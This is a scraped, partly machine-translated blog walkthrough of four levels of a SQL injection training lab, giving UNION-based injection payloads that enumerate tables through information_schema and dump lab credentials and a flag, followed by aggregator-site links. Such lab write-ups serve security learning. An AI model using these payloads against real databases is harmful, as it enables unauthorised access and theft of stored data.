Significant fault injection four off

Others 2019-10-13 18:23:55 views: null

Four off Address:

http://59.63.200.79:8812/New/ErrorBased/RankOne/sql-one/

http://59.63.200.79:8812/New/ErrorBased/RankTwo/sql-two/

http://59.63.200.79:8812/New/ErrorBased/RankThree/sql-three/

http://59.63.200.79:8812/New/ErrorBased/RankFour/sql-four/

Significant fault injection first pass:
1, first determines whether there is an input id = 1 and injected id = 1 'indicating the presence injection page change??
2, input id = 1 order by 1 2 3 4 3 determines number of fields is the result? display id needs to 'closed
[image]

3, combined echo injection point is determined:

  1. ?id=9.999' union select 1,2,3 --+ #注释掉后面的limit


Analyzing the echo points 2 and 3, field
4, database query using the system comes all the table names and field names:

  1. 数据库中的一个所有库的表:表名information_schema.tables 库名字段 table_schema 指定库名database()查表名
  2. 数据库中的一个所有表的表:表名information_schema.columns 表名字段table_name 列名字段:column_name 指定表名查字段名
  1. ?id=9.999' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database()--+


Now we know the name of the table can check the field name:

  1. ?id=9.999' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='zkaq'--+


Now we know the table name field name can check the value of the inside:

  1. ?id=9.999' union select 1,group_concat(zKaQ),3 from zkaq --+
  2. ?id=1' union select 1,2,group_concat(zKaQ) from zkaq limit 1,1--+


You can put all the tables of all detected values:
Table Name: emails, referers, uagents, the Users, zkaq
zkaq Table Field Name: Flag, zKaQ
emails table field names: the above mentioned id, EMAIL_ID
referers table field names: the above mentioned id, Referer, ip_address
uagents table field names: the above mentioned id, uagent, ip_address, username
the Users table field name: USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id , username (zkz, zkaq), password (zkz, zkaq)

显错注入第二关
第二关除了?id后面不用和第一关一样加’闭合外 其他基本一样

显错注入第三关
第三关先输入?id=1出现以下图示:

由此可见,这一关我们需要闭合前面的括号,注释掉后面的括号:?id=1‘) and 1=1%20 —+
后面的操作和前两关类似

  1. ?id=9.999 ') union select 1,2,group_concat(zKaQ) from zkaq --+ #需要闭合前面的括号,注释掉后面的括号

显错注入第四关
第四关与第三关类似 只是由单引号变为双引号 和上一关相似的闭合方法:

  1. ?id=1 ") and 1=1 --+

步骤与以上方法一致:

  1. ?id=9.999 ")%20 union select 1,2,group_concat(zKaQ) from zkaq --+

 

 

Guess you like

Origin www.cnblogs.com/Qiuzhiyu/p/11666703.html
Recommended
The sixth meeting of openKylin Community Ecology Committee was successfully held
Alibaba Cloud officially releases Tongyi Qianwen 2.5
Python 3.13 releases first Beta: experimental free-threading mode and JIT, improved interactive interpreter
Stack Overflow used my code to train large AI models and banned my account.
Pop!_OS’s COSMIC desktop completes App Store listing
Report: Django is still the first choice for 74% of developers
"Internet Investment and Financing Operation in the First Quarter of 2024" Research Report
15 years ago, he was on the "FFmpeg pillar of shame", and today he still has to thank us - Tencent QQPlayer avenges its shame?
Ranking
Python handwritten digit recognition, the corresponding mathematical formulas and Detailed procedures
Der M-Chip-Mac implementiert mehrere Android-Emulatoren
CentOS 명령줄 모드에서 화면이 항상 켜져 있도록 설정 ---- 예상한 효과를 얻지 못했습니다.
Teach you step by step how to use GDB to debug programs: a comprehensive guide from entry to mastery
python3 pip ipython installation
A lot of python crawler source code sharing -- talk about the little thing about python crawler
Agile Sprint in Alpha Stage (7)
Access URL in Unity
FunctoinDemo form
MS SQL common SQL statements (6): create, modify, delete triggers and other operations sq
Daily
More
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)

Code World

© 2018 codetd.com